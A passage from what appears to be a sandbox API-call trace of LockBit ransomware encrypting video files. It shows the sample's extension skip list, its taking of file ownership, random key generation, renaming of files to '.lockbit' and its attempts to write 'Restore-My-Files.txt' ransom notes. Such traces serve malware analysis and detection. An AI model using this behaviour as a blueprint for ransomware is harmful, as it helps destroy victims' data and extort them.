-1 [0079.831] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.831] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.832] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.832] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_PreComp_MATTE_PAL.wmv") returned 1 [0079.833] lstrcmpiW (lpString1="ntldr", lpString2="flower_PreComp_MATTE_PAL.wmv") returned 1 [0079.833] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_PreComp_MATTE_PAL.wmv") returned 1 [0079.833] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_PreComp_MATTE_PAL.wmv") returned -1 [0079.833] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_PreComp_MATTE_PAL.wmv") returned -1 [0079.833] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_PreComp_MATTE_PAL.wmv") returned 1 [0079.833] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_PreComp_MATTE_PAL.wmv") returned 1 [0079.833] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.833] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned=".wmv" [0079.833] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.833] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.833] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.834] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.834] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv.lockbit") returned 90 [0079.834] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.835] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.835] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.835] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.836] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.836] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.836] RtlFreeAnsiString (AnsiString="\\") [0079.836] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.836] malloc (_Size=0x200) returned 0x77d800 [0079.836] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.836] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.836] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.836] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.837] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.837] CloseHandle (hObject=0x3c4) returned 1 [0079.837] free (_Block=0x77d800) [0079.837] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.837] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.837] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.837] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=85208) returned 1 [0079.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.839] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.839] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.844] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.844] malloc (_Size=0xca) returned 0x1ff1e60 [0079.844] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0079.848] free (_Block=0x1ff1e60) [0079.848] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.848] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.848] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.848] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b788b6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b788b6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x26618, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_trans_matte.wmv", cAlternateFileName="")) returned 1 [0079.848] lstrcmpiW (lpString1=".", lpString2="flower_trans_matte.wmv") returned -1 [0079.848] lstrcmpiW (lpString1="..", lpString2="flower_trans_matte.wmv") returned -1 [0079.848] PathFindExtensionW (pszPath="flower_trans_matte.wmv") returned=".wmv" [0079.848] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.848] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.849] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.849] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="flower_trans_matte.wmv") returned 1 [0079.850] lstrcmpiW (lpString1="ntldr", lpString2="flower_trans_matte.wmv") returned 1 [0079.850] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="flower_trans_matte.wmv") returned 1 [0079.850] lstrcmpiW (lpString1="bootsect.bak", lpString2="flower_trans_matte.wmv") returned -1 [0079.850] lstrcmpiW (lpString1="autorun.inf", lpString2="flower_trans_matte.wmv") returned -1 [0079.850] lstrcmpiW (lpString1="thumbs.db", lpString2="flower_trans_matte.wmv") returned 1 [0079.850] lstrcmpiW (lpString1="iconcache.db", lpString2="flower_trans_matte.wmv") returned 1 [0079.850] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.850] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned=".wmv" [0079.850] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.850] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0079.850] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0079.851] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0079.851] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv.lockbit") returned 84 [0079.851] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.852] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.852] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.852] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.852] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.853] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.853] RtlFreeAnsiString (AnsiString="\\") [0079.853] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.853] malloc (_Size=0x200) returned 0x77d800 [0079.853] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.853] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.853] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.853] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.854] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.854] CloseHandle (hObject=0x3c4) returned 1 [0079.854] free (_Block=0x77d800) [0079.854] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.854] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.854] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.854] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=157208) returned 1 [0079.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.856] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.861] malloc (_Size=0xbe) returned 0x1ff1e60 [0079.861] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0079.866] free (_Block=0x1ff1e60) [0079.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.867] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.867] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.867] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b9ea13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b9ea13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x28558, dwReserved0=0x0, dwReserved1=0x0, cFileName="flower_trans_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0079.867] lstrcmpiW (lpString1=".", lpString2="flower_trans_MATTE_PAL.wmv") returned -1 [0079.867] lstrcmpiW (lpString1="..", lpString2="flower_trans_MATTE_PAL.wmv") returned -1 [0079.867] PathFindExtensionW (pszPath="flower_trans_MATTE_PAL.wmv") returned=".wmv" [0079.867] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.867] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.868] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.869] 